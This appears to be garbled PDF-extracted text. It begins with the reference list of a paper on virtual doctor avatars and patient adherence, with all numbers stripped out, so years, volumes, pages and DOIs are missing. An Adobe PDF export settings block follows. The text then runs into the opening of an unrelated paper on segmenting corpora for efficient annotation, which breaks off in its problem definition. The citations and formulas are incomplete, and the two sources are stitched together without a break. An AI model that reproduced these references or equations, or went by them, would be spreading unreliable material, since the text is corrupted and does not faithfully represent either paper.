of artificial intelligence in education ( ): – . baylor al, ryu j. . the effects of image and animation in enhancing pedagogical agent persona. journal of educational computing research ( ): – doi . /v wq-nwgn-jb -fat . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /jncimonographs/lgt http://dx.doi.org/ . / - - - - .ch http://dx.doi.org/ . /pres. . . http://dx.doi.org/ . / .mlr. . . f http://dx.doi.org/ . /j.amepre. . . http://dx.doi.org/ . /rstb. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /v wq-nwgn-jb -fat http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ benjamin rm. . medication adherence: helping patients take their medicines as directed. public health reports ( ): – doi . / . bennett jk, fuertes jn, keitel m, phillips r. . the role of patient attachment and working alliance on patient adherence, satisfaction, and health-related quality of life in lupus treatment. patient education and counseling ( ): – doi . /j.pec. . . . bente g, rüggenberg s, krämer nc, eschenburg f. . avatar-mediated networking: increasing social presence and interpersonal trust in net-based collaborations. human communication research ( ): – doi . /j. - . . .x. bickmore tw, pfeifer lm, byron d, forsythe s, henault le, jack bw, silliman r, paasche-orlow mk. a. usability of conversational agents by patients with inadequate health literacy: evidence from two clinical trials. journal of health communication (sup ): – doi . / . . . bickmore tw, pfeifer lm, jack bw. . taking the time to care: empowering low health literacy hospital patients with virtual nurse agents. in: proceedings of the sigchi conference on human factors in computing systems. new york: acm, – doi . / . . bickmore tw, pfeifer lm, paasche-orlow mk. . using computer agents to explain medical documents to patients with low health literacy. patient education and counseling ( ): – doi . /j.pec. . . . bickmore tw, puskar k, schlenk ea, pfeifer lm, sereika sm. b. maintaining reality: relational agents for antipsychotic medication adherence. interacting with computers ( ): – doi . /j.intcom. . . . bodenheimer t, chen e, bennett hd. . confronting the growing burden of chronic disease: can the us health care workforce do the job? health affairs ( ): – doi . /hlthaff. . . . bodenheimer ts, smith md. . primary care: proposed solutions to the physician shortage without training more physicians. health affairs ( ): – doi . /hlthaff. . . borel j-c, pepin j-l, pison c, vesin a, gonzalez-bermejo j, court-fortune i, timsit j-f. . long-term adherence with non-invasive ventilation improves prognosis in obese copd patients. respirology ( ): – doi . /resp. . burgoon jk, hale jl. . nonverbal expectancy violations: model elaboration and application to immediacy behaviors. communications monographs ( ): – doi . / . burgoon jk, pfau m, parrott r, birk t, coker r, burgoon m. . relational communication, satisfaction, compliance-gaining strategies, and compliance in communication between physicians and patients. communications monographs ( ): – doi . / . burgoon jk, walther jb. . nonverbal expectancies and the evaluative consequences of violations. human communication research ( ): – doi . /j. - . .tb .x. chaiken s. . communicator physical attractiveness and persuasion. journal of personality and social psychology ( ): – doi . / - . . . . chaiken s. . heuristic versus systematic information processing and the use of source versus message cues in persuasion. journal of personality and social psychology ( ): – doi . / - . . . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . / . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . /j.intcom. . . http://dx.doi.org/ . /hlthaff. . . http://dx.doi.org/ . /hlthaff. . http://dx.doi.org/ . /resp. http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chang g, weiss ap, orav ej, smallwood ja, gonzalez s, kosowsky jm, rauch sl. . bottlenecks in the emergency department: the psychiatric clinicians’ perspective. general hospital psychiatry ( ): – doi . /j.genhosppsych. . . . chattopadhyay d, macdorman kf. . familiar faces rendered strange: why inconsistent realism drives characters into the uncanny valley. journal of vision ( ): doi . / . . . cohen j. . eta-squared and partial eta-squared in fixed factor anova designs. educational and psychological measurement ( ): – doi . / . colwill jm, cultice jm, kruse rl. . will generalist physician supply meet demands of an increasing and aging population? health affairs ( ):w –w doi . /hlthaff. . .w . cook da, triola mm. . virtual patients: a critical literature review and proposed next steps. medical education ( ): – doi . /j. - . . .x. cousin g, mast ms, jaunin-stalder n. . when physician-expressed uncertainty leads to patient dissatisfaction: a gender study. medical education ( ): – doi . /medu. . cousin g, mast ms, roter dl, hall ja. . concordance between physician communication style and patient attitudes predicts patient satisfaction. patient education and counseling ( ): – doi . /j.pec. . . . cuddy aj, fiske st, glick p. . warmth and competence as universal dimensions of social perception: the stereotype content model and the bias map. advances in experimental social psychology : – doi . /s - ( ) - . cutler rl, fernandez-llimos f, frommer m, benrimoj c, garcia-cardenas v. . economic impact of medication non-adherence by disease groups: a systematic review. bmj open :e doi . /bmjopen- - . cyr d, hassanein k, head m, ivanov a. . the role of social presence in establishing loyalty in e-service environments. interacting with computers ( ): – doi . /j.intcom. . . . desmet a, van ryckeghem d, compernolle s, baranowski t, thompson d, crombez g, poels k, van lippevelde w, bastiaensens s, van cleemput k, vandebosch h, de bourdeaudhuij i. . a meta-analysis of serious digital games for healthy lifestyle promotion. preventive medicine : – doi . /j.ypmed. . . . fiske st, cuddy aj, glick p. . universal dimensions of social cognition: warmth and competence. trends in cognitive sciences ( ): – doi . /j.tics. . . . fiske st, cuddy aj, glick p, xu j. . a model of (often mixed) stereotype content: competence and warmth respectively follow from perceived status and competition. journal of personality and social psychology ( ): – doi . / - . . . . funke f, reips u-d. . why semantic differentials in web-based research should be made from visual analogue scales and not from -point scales. field methods ( ): – doi . / x . garau m, slater m, pertaub d-p, razzaque s. . the responses of people to virtual humans in an immersive virtual environment. presence: teleoperators and virtual environments ( ): – doi . / . gilbert rl, forney a. . can avatars pass the turing test? intelligent agent perception in a d virtual environment. international journal of human-computer studies : – doi . /j.ijhcs. . . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.genhosppsych. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . / http://dx.doi.org/ . /hlthaff. . .w http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /medu. http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /bmjopen- - http://dx.doi.org/ . /j.intcom. . . http://dx.doi.org/ . /j.ypmed. . . http://dx.doi.org/ . /j.tics. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / x http://dx.doi.org/ . / http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ guadagno re, swinth kr, blascovich j. . social evaluations of embodied agents and avatars. computers in human behavior ( ): – doi . /j.chb. . . . ho c-c, macdorman kf. . revisiting the uncanny valley theory: developing and validating an alternative to the godspeed indices. computers in human behavior ( ): – doi . /j.chb. . . . ho c-c, macdorman kf. . measuring the uncanny valley effect. international journal of social robotics ( ): – . holzwarth m, janiszewski c, neumann mm. . the influence of avatars on online consumer shopping behavior. journal of marketing ( ): – doi . /jmkg. . . . hu l, bentler pm. . cutoff criteria for fit indexes in covariance structure analysis: conventional criteria versus new alternatives. structural equation modeling: a multidisciplinary journal ( ): – doi . / . iuga ao, mcguire mj. . adherence and health care costs. risk management and healthcare policy : – doi . /rmhp.s . jackson dl. . revisiting sample size and number of parameter estimates: some support for the n:q hypothesis. structural equation modeling ( ): – doi . /s sem _ . jain sp, posavac ss. . prepurchase attribute verifiability, source credibility, and persuasion. journal of consumer psychology ( ): – doi . /s jcp _ . janssen sm, lagro-janssen al. . a physician’s gender, communication style, patient preferences and patient satisfaction in gynecology and obstetrics: a systematic review. patient education and counseling ( ): – doi . /j.pec. . . . jin s-aa, bolebruch j. . avatar-based advertising in second life: the role of presence and attractiveness of virtual spokespersons. journal of interactive advertising : – doi . / . . . jin s-aa, sung y. . the roles of spokes-avatars’ personalities in brand communication in d virtual environments. journal of brand management ( ): – doi . /bm. . . joseph wb. . the credibility of physically attractive communicators: a review. journal of advertising ( ): – doi . / . . . kätsyri j, förger k, mäkäräinen m, takala t. . a review of empirical evidence on different uncanny valley hypotheses: support for perceptual mismatch as one road to the valley of eeriness. frontiers in psychology : doi . /fpsyg. . . keeling k, mcgoldrick p, beatty s. . avatars as salespeople: communication style, trust, and intentions. journal of business research ( ): – doi . /j.jbusres. . . . khan rf, sutcliffe a. . attractive agents are more persuasive. international journal of human-computer interaction ( ): – doi . / . . . kim y, baylor al, shen e. . pedagogical agents as learning companions: the impact of agent emotion and gender. journal of computer assisted learning ( ): – doi . /j. - . . .x. kim ss, kaplowitz s, johnston mv. . the effects of physician empathy on patient satisfaction and compliance. evaluation & the health professions ( ): – doi . / . kline rb. . principles and practice of structural equation modeling. new york: guilford press. kokkinara e, mcdonnell r. . animation realism affects perceived character appeal of a self-virtual face. in: proceedings of the eighth acm siggraph conference on motion in games. new york: acm, – doi . / . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /jmkg. . . http://dx.doi.org/ . / http://dx.doi.org/ . /rmhp.s http://dx.doi.org/ . /s sem _ http://dx.doi.org/ . /s jcp _ http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /bm. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /fpsyg. . http://dx.doi.org/ . /j.jbusres. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lacrosse mb. . nonverbal behavior and perceived counselor attractiveness and persuasiveness. journal of counseling psychology ( ): – doi . / - . . . . lu as, baranowski t, thompson d, buday r. . story immersion of videogames for youth health promotion: a review of literature. games for health: research, development, and clinical applications ( ): – doi . /g h. . . maccallum rc, browne mw, sugawara hm. . power analysis and determination of sample size for covariance structure modeling. psychological methods ( ): – doi . // - x. . . . macdorman kf, chattopadhyay d. . reducing consistency in human realism increases the uncanny valley effect; increasing category uncertainty does not. cognition : – doi . /j.cognition. . . . macdorman kf, green rd, ho c-c, koch ct. . too real for comfort? uncanny responses to computer generated faces. computers in human behavior ( ): – doi . /j.chb. . . . maddux je, rogers rw. . effects of source expertness, physical attractiveness, and supporting arguments on persuasion: a case of brains over beauty. journal of personality and social psychology ( ): – doi . / - . . . . mäkäräinen m, kätsyri j, förger k, takala t. . the funcanny valley: a study of positive emotional reactions to strangeness. in: proceedings of the th international academic mindtrek conference. acm, – . mangan b. . the uncanny valley as fringe experience. interaction studies ( ): – doi . /is. . . man. marple bf, fornadley ja, patel aa, fineman sm, fromer l, krouse jh, lanier bq, penna p. . keys to successful management of patients with allergic rhinitis: focus on patient confidence, compliance, and satisfaction. otolaryngology-head and neck surgery ( -suppl):s –s doi . /j.otohns. . . . mast ms, hall ja, roter dl. . disentangling physician sex and physician communication style: their effects on patient satisfaction in a virtual medical visit. patient education and counseling ( ): – doi . /j.pec. . . . mathur mb, reichling db. . navigating a social world with robot partners: a quantitative cartography of the uncanny valley. cognition : – doi . /j.cognition. . . . mccroskey jc, teven jj. . goodwill: a reexamination of the construct and its measurement. communications monographs ( ): – doi . / . mcginnies e, ward cd. . better liked than right: trustworthiness and expertise as factors in credibility. personality and social psychology bulletin ( ): – doi . / . mitchell wj, szerszen ka, lu as, schermerhorn pw, scheutz m, macdorman kf. . a mismatch in the human realism of face and voice produces an uncanny valley. i-perception ( ): – doi . /i . moore rk. . a bayesian explanation of the ‘uncanny valley’ effect and related psychological phenomena. scientific reports ( ): doi . /srep . mori m. . the uncanny valley (macdorman kf, kageki n, trans.). ieee robotics and automation ( ): – doi . /mra. . . o’hair d. . patient preferences for physician persuasion strategies. theoretical medicine ( ): – doi . /bf . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /g h. . http://dx.doi.org/ . // - x. . . http://dx.doi.org/ . /j.cognition. . . http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /is. . . man http://dx.doi.org/ . /j.otohns. . . http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . /j.cognition. . . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /i http://dx.doi.org/ . /srep http://dx.doi.org/ . /mra. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ o’hair d, o’hair mj, southward gm, krayer kj. . physician communication and patient compliance. journal of compliance in health care ( ): – . ohana s, mash r. . physician and patient perceptions of cultural competency and medical compliance. health education research ( ): – doi . /her/cyv . pallak sr. . salience of a communicator’s physical attractiveness and persuasion: a heuristic versus systematic processing interpretation. social cognition ( ): – doi . /soco. . . . . pallak sr, murroni e, koch j. . communicator attractiveness and expertise, emotional versus rational appeals, and persuasion: a heuristic versus systematic processing interpretation. social cognition ( ): – doi . /soco. . . . . parsons td, kenny p, ntuen ca, pataki cs, pato mt, rizzo aa, st-george c, sugar j. . objective structured clinical interview training using a virtual human patient. studies in health technology and informatics : – . patel h, macdorman kf. . sending an avatar to do a human’s job: compliance with authority persists despite the uncanny valley. presence: teleoperators and virtual environments ( ): – doi . /pres_a_ . peña j, yoo s-c. . under pressure: avatar appearance and cognitive load effects on attitudes, trustworthiness, bidding, and interpersonal distance in a virtual store. presence: teleoperators and virtual environments ( ): – doi . /pres_a_ . perry sd, jenzowsky sa, hester jb, king cm, yi h. . the influence of commercial humor on program enjoyment and evaluation. journalism & mass communication quarterly ( ): – doi . / . persky s. . employing immersive virtual environments for innovative experiments in health care communication. patient education and counseling ( ): – doi . /j.pec. . . . persky s, eccleston cp. . medical student bias and care recommendations for an obese versus non-obese virtual patient. international journal of obesity : – . pickersgill t. . the european working time directive for doctors in training: we will need more doctors and better organisation to comply with the law. bmj: british medical journal ( ): . plant ea, baylor al, doerr ce, rosenberg-kima rb. . changing middle-school students’ attitudes and performance regarding engineering with computer-based social models. computers & education ( ): – doi . /j.compedu. . . . pornpitakpan c. . the persuasiveness of source credibility: a critical review of five decades’ evidence. journal of applied social psychology ( ): – doi . /j. - . .tb .x. potempa km, redman rw, landstrom g. . human resources in nursing education: a worldwide crisis. collegian ( ): – doi . /j.colegn. . . . qiu l, benbasat i. . evaluating anthropomorphic product recommendation agents: a social relationship perspective to designing information systems. journal of management information systems ( ): – doi . /mis - . raij ab, johnsen k, dickerson rf, lok bc, cohen ms, duerson m, pauly rr, stevens ao, wagner p, lind ds. . comparing interpersonal interactions with a virtual human to those with a real human. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . read jl, shortell sm. . interactive games to promote behavior change in prevention and treatment. jama ( ): – doi . /jama. . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /her/cyv http://dx.doi.org/ . /soco. . . . http://dx.doi.org/ . /soco. . . . http://dx.doi.org/ . /pres_a_ http://dx.doi.org/ . /pres_a_ http://dx.doi.org/ . / http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . /j.compedu. . . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.colegn. . . http://dx.doi.org/ . /mis - http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /jama. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reips u-d, funke f. . interval-level measurement with visual analogue scales in internet-based research: vas generator. behavior research methods ( ): – doi . /brm. . . . roebuck mc, liberman jn, gemmill-toyama m, brennan ta. . medication adherence leads to lower health care use and costs despite increased drug spending. health affairs ( ): – doi . /hlthaff. . . sertoglu ae, catl o, korkmaz s. . examining the effect of endorser credibility on the consumers’ buying intentions: an empirical study in turkey. international review of management and marketing : . seyama j, nagayama rs. . the uncanny valley: effect of realism on the impression of artificial human faces. presence: teleoperators and virtual environments ( ): – doi . /pres. . . . skalski p, tamborini r. . the role of social presence in interactive agent-based persuasion. media psychology ( ): – doi . / . sklar dp. . how many doctors will we need? a special issue on the physician workforce. academic medicine ( ): – doi . /acm. . swain s, hariharan m, rana s, chivukula u, thomas m. . doctor–patient communication: impact on adherence and prognosis among patients with primary hypertension. psychological studies ( ): – doi . /s - - - . thompson d. . designing serious video games for health behavior change: current status and future directions. journal of diabetes science and technology ( ): – doi . / . tongpeth j, du hy, clark ra. . development and feasibility testing of an avatar-based education application for patients with acute coronary syndrome. journal of clinical nursing ( – ): – doi . /jocn. . van der heide b, schumaker em. . computer-mediated persuasion and compliance: social influence on the internet and beyond. social net: understanding our online behavior : – doi . /acprof:oso/ . . . vermeire e, hearnshaw h, van royen p, denekens j. . patient adherence to treatment: three decades of research. a comprehensive review. journal of clinical pharmacy and therapeutics ( ): – doi . /j. - . . .x. willson p, mcnamara jr. . how perceptions of a simulated physician–patient interaction influence intended satisfaction and compliance. social science & medicine ( ): – doi . / - ( ) - . wood nt, solomon mr, englis bg. . personalisation of online avatars: is the messenger as important as the message? international journal of internet marketing and advertising ( / ): – doi . /ijima. . . zanbaka c, goolkasian p, hodges l. . can a virtual cat persuade you? the role of gender and realism in speaker persuasiveness. in: proceedings of the sigchi conference on human factors in computing systems, new york: acm, – doi . / . . zibrek k, kokkinara e, mcdonnell r. . the effect of realistic appearance of virtual characters in immersive environments— does the character’s personality play a role? ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /brm. . . http://dx.doi.org/ . /hlthaff. . http://dx.doi.org/ . /pres. . . http://dx.doi.org/ . / http://dx.doi.org/ . /acm. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /jocn. http://dx.doi.org/ . /acprof:oso/ . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /ijima. . http://dx.doi.org/ . / . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the doctor’s digital double: how warmth, competence, and animation promote adherence intention introduction methods results discussion conclusions appendix a: script appendix b: indices flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice segmentation for efficient supervised language annotation with an explicit cost-utility tradeoff segmentation for efficient supervised language annotation with an explicit cost-utility tradeoff matthias sperber , mirjam simantzik , graham neubig , satoshi nakamura , alex waibel karlsruhe institute of technology, institute for anthropomatics, germany mobile technologies gmbh, germany nara institute of science and technology, ahc laboratory, japan matthias.sperber@kit.edu, mirjam.simantzik@jibbigo.com, neubig@is.naist.jp s-nakamura@is.naist.jp, waibel@kit.edu abstract in this paper, we study the problem of manu- ally correcting automatic annotations of natu- ral language in as efficient a manner as pos- sible. we introduce a method for automati- cally segmenting a corpus into chunks such that many uncertain labels are grouped into the same chunk, while human supervision can be omitted altogether for other segments. a tradeoff must be found for segment sizes. choosing short segments allows us to reduce the number of highly confident labels that are supervised by the annotator, which is useful because these labels are often already correct and supervising correct labels is a waste of effort. in contrast, long segments reduce the cognitive effort due to context switches. our method helps find the segmentation that opti- mizes supervision efficiency by defining user models to predict the cost and utility of su- pervising each segment and solving a con- strained optimization problem balancing these contradictory objectives. a user study demon- strates noticeable gains over pre-segmented, confidence-ordered baselines on two natural language processing tasks: speech transcrip- tion and word segmentation. introduction many natural language processing (nlp) tasks re- quire human supervision to be useful in practice, be it to collect suitable training material or to meet some desired output quality. given the high cost of human intervention, how to minimize the supervi- sion effort is an important research problem. previ- ous works in areas such as active learning, post edit- (a) it was a bright cold (they) in (apron), and (a) clocks were striking thirteen. (b) it was a bright cold (they) in (apron), and (a) clocks were striking thirteen. (c) it was a bright cold (they) in (apron), and (a) clocks were striking thirteen. figure : three automatic transcripts of the sentence “it was a bright cold day in april, and the clocks were strik- ing thirteen”, with recognition errors in parentheses. the underlined parts are to be corrected by a human for (a) sentences, (b) words, or (c) the proposed segmentation. ing, and interactive pattern recognition have inves- tigated this question with notable success (settles, ; specia, ; gonzález-rubio et al., ). the most common framework for efficient anno- tation in the nlp context consists of training an nlp system on a small amount of baseline data, and then running the system on unannotated data to estimate confidence scores of the system’s predictions (set- tles, ). sentences with the lowest confidence are then used as the data to be annotated (figure (a)). however, it has been noted that when the nlp system in question already has relatively high accu- racy, annotating entire sentences can be wasteful, as most words will already be correct (tomanek and hahn, ; neubig et al., ). in these cases, it is possible to achieve much higher benefit per anno- tated word by annotating sub-sentential units (fig- ure (b)). however, as settles et al. ( ) point out, sim- ply maximizing the benefit per annotated instance is not enough, as the real supervision effort varies transactions of the association for computational linguistics, ( ) – . action editor: eric fosler-lussier. submitted / ; revised / ; published / . c© association for computational linguistics. segment length a vg . t im e / i ns ta nc e [s ec ] transcription task word segmentation task figure : average annotation time per instance, plotted over different segment lengths. for both tasks, the effort clearly increases for short segments. greatly across instances. this is particularly impor- tant in the context of choosing segments to annotate, as human annotators heavily rely on semantics and context information to process language, and intu- itively, a consecutive sequence of words can be su- pervised faster and more accurately than the same number of words spread out over several locations in a text. this intuition can also be seen in our empiri- cal data in figure , which shows that for the speech transcription and word segmentation tasks described later in section , short segments had a longer anno- tation time per word. based on this fact, we argue it would be desirable to present the annotator with a segmentation of the data into easily supervisable chunks that are both large enough to reduce the num- ber of context switches, and small enough to prevent unnecessary annotation (figure (c)). in this paper, we introduce a new strategy for nat- ural language supervision tasks that attempts to op- timize supervision efficiency by choosing an appro- priate segmentation. it relies on a user model that, given a specific segment, predicts the cost and the utility of supervising that segment. given this user model, the goal is to find a segmentation that mini- mizes the total predicted cost while maximizing the utility. we balance these two criteria by defining a constrained optimization problem in which one cri- terion is the optimization objective, while the other criterion is used as a constraint. doing so allows specifying practical optimization goals such as “re- move as many errors as possible given a limited time budget,” or “annotate data to obtain some required classifier accuracy in as little time as possible.” solving this optimization task is computationally difficult, an np-hard problem. nevertheless, we demonstrate that by making realistic assumptions about the segment length, an optimal solution can be found using an integer linear programming for- mulation for mid-sized corpora, as are common for supervised annotation tasks. for larger corpora, we provide simple heuristics to obtain an approximate solution in a reasonable amount of time. experiments over two example scenarios demon- strate the usefulness of our method: post editing for speech transcription, and active learning for japanese word segmentation. our model predicts noticeable efficiency gains, which are confirmed in experiments with human annotators. problem definition the goal of our method is to find a segmentation over a corpus of word tokens wn that optimizes supervision efficiency according to some predictive user model. the user model is denoted as a set of functions ul,k(wba) that evaluate any possible sub- sequence wba of tokens in the corpus according to criteria l l, and supervision modes k k. let us illustrate this with an example. sperber et al. ( ) defined a framework for speech transcrip- tion in which an initial, erroneous transcript is cre- ated using automatic speech recognition (asr), and an annotator corrects the transcript either by correct- ing the words by keyboard, by respeaking the con- tent, or by leaving the words as is. in this case, we could define k={type, respeak, skip}, each constant representing one of these three supervision modes. our method will automatically determine the appropriate supervision mode for each segment. the user model in this example might evaluate ev- ery segment according to two criteria l, a cost crite- rion (in terms of supervision time) and a utility cri- terion (in terms of number of removed errors), when using each mode. intuitively, respeaking should be assigned both lower cost (because speaking is faster than typing), but also lower utility than typing on a keyboard (because respeaking recognition errors can occur). the skip mode denotes the special, unsuper- vised mode that always returns cost and utility. other possible supervision modes include mul- tiple input modalities (suhm et al., ), several human annotators with different expertise and cost (donmez and carbonell, ), and correction vs. translation from scratch in machine translation (spe- cia, ). similarly, cost could instead be ex- pressed in monetary terms, or the utility function could predict the improvement of a classifier when the resulting annotation is not intended for direct hu- man consumption, but as training data for a classifier in an active learning framework. optimization framework given this setting, we are interested in simulta- neously finding optimal locations and supervision modes for all segments, according to the given cri- teria. each resulting segment will be assigned ex- actly one of these supervision modes. we de- note a segmentation of the n tokens of corpus wn into mn segments by specifying segment bound- ary markers sm + =(s = , s , . . . , sm + =n + ). setting a boundary marker si=a means that we put a segment boundary before the a-th word to- ken (or the end-of-corpus marker for a=n + ). thus our corpus is segmented into token sequences [(wsj , . . . , wsj+ � )] m j= . the supervision modes assigned to each segment are denoted by mj . we favor those segmentations that minimize the cumu- lative value pm j= [ul,mj (w sj+ sj )] for each criterion l. for any criterion 